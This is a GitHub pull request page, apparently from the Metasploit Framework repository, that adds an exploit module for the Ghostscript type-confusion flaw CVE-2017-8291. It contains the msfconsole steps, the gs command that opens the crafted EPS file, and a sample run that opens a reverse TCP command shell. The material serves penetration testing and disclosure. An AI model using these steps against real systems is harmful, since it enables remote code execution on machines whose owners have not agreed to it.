New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Ghostscript CVE-2017-8291 module based on the public PoC #8316

Merged
merged 1 commit into from May 1, 2017

Conversation

Projects
None yet
3 participants
@hdm
Contributor

hdm commented Apr 28, 2017

This module exploits a type confusion error in Ghostscript 9.21 and below. It is based on the public proof-of-concept attached to the original ticket in the bug tracker @ https://bugs.ghostscript.com/show_bug.cgi?id=697808.

Verification

  • Start msfconsole
  • use exploit/unix/fileformat/ghostscript_type_confusion
  • exploit
  • In a shell, run: gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f /home/hdm/.msf4/local/msf.eps
  • Verify that a session has been created

Sample run:

msf > use exploit/unix/fileformat/ghostscript_type_confusion 
msf exploit(ghostscript_type_confusion) > exploit

[*] Started reverse TCP handler on 192.168.0.3:4444 
[+] msf.eps stored at /home/hdm/.msf4/local/msf.eps
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.3:54164) at 2017-04-28 10:00:31 -0500

id
uid=1000(hdm) gid=1002(hdm) groups=1002(hdm)
exit

[*] 192.168.0.3 - Command shell session 1 closed.  Reason: Died from EOFError

msf exploit(ghostscript_type_confusion) > 

@wvu-r7 wvu-r7 self-assigned this Apr 28, 2017

@wvu-r7 wvu-r7 merged commit afc804f into rapid7:master May 1, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request May 1, 2017

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 May 1, 2017

Contributor
Contributor

wvu-r7 commented May 1, 2017

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 May 8, 2017

Contributor

Release Notes

The exploit/unix/fileformat/ghostscript_type_confusion module has been added to the framework. It exploits a type confusion error in Ghostscript 9.21 and below.

Contributor

wvu-r7 commented May 8, 2017

Release Notes

The exploit/unix/fileformat/ghostscript_type_confusion module has been added to the framework. It exploits a type confusion error in Ghostscript 9.21 and below.

@tdoan-r7 tdoan-r7 added the rn-exploit label May 10, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment